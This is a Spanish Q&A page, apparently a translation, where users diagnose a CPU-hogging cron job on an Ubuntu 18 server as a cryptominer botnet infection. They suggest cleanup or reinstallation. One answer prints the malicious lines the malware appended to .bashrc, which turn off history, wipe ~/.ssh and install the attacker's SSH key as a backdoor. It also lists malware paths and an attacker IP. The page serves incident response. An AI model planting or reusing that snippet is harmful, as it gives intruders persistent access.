Saltar al contenido

Strange Cron Job ocupa el 100% de la CPU Ubuntu 18 LTS Server

Te traemos el hallazgo a este asunto, al menos eso creemos. Si sigues con inquietudes coméntalo, que con placer te ayudaremos

Lo más probable es que su máquina tenga una infección de criptominero. Puede ver a otra persona informando sobre nombres de archivo y comportamientos similares en Detección en la vida real de una máquina virtual en Azure con Security Center. Véase también Mi servidor Ubuntu tiene un virus… Lo he localizado pero no puedo deshacerme de él… en Reddit.

Ya no puede confiar en esa máquina y debe volver a instalarla. Tenga cuidado con la restauración de copias de seguridad.

Su máquina ha sido infectada con un ataque de criptominero. También enfrenté un ataque de ransomware similar en el pasado y mi base de datos se vio comprometida. Tomé un volcado de SQL para la máquina y reaprovisioné la máquina (ya que mi máquina era una máquina virtual alojada en AWS EC2). También modifiqué los grupos de seguridad de la máquina para bloquear el acceso SSH y modifiqué las contraseñas. También habilité el registro para registrar consultas y exportarlas a S3 todas las noches.

Me pasó lo mismo, y me di cuenta ayer. Revisé el archivo /var/log/syslog y esta IP (185.234.218.40) parecía estar ejecutando cronjobs automáticamente.

Lo revisé en http://whatismyipaddress.com (https://whatismyipaddress.com/ip/185.234.218.40) y tiene algunos informes. Estos archivos fueron editados por el troyano:

  • .bashrc
  • .ssh/claves_autorizadas

Encontré esto al final de .bashrc (que se ejecuta cada vez que se abre bash):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

es borrar tu authorized_keys archivo, que es una lista de SSH keys que pueden conectarse sin contraseña. Luego, agrega el SSH del atacante key:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Además, encontré esta carpeta: /tmp/.X13-unix/.rsync, donde está todo el malware. Incluso encontré un archivo, /tmp/.X13-unix/.rsync/c/ip, un archivo que contiene 70 000 direcciones IP, que muy probablemente sean otras víctimas o servidores de nodo.

Hay 2 soluciones: A:

  • Agregue un firewall que bloquee todas las conexiones salientes excepto el puerto 22 y otras que considere necesarias y habilite fail2ban, un programa que bloquea una dirección IP después de X intentos fallidos de contraseña

  • Elimina todos los trabajos cron:
    ps aux | grep cron, luego elimine el PID que aparece

  • Cambia tu contraseña a una segura

B:

  • Haga una copia de seguridad de los archivos o carpetas que necesite o desee

  • Reinicie el servidor y reinstale Ubuntu, o cree directamente una nueva gota

    Como dijo Thom Wiggers, ciertamente eres parte de una botnet de minería de bitcoin, y su servidor tiene una puerta trasera. La puerta trasera emplea un exploit perl, un archivo que se encuentra aquí: /tmp/.X13-unix/.rsync/b/run, que contiene esto (https://pastebin.com/ceP2jsUy)

Las carpetas más sospechosas que encontré fueron:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (que fue editado)

  • ~/.firefoxcatche

Finalmente, hay un artículo relacionado con Perl Backdoor aquí: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Espero que encuentres esto útil.

Si haces scroll puedes encontrar las explicaciones de otros programadores, tú asimismo eres capaz insertar el tuyo si lo deseas.

¡Haz clic para puntuar esta entrada!
(Votos: 0 Promedio: 0)


Tags :

Utiliza Nuestro Buscador

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *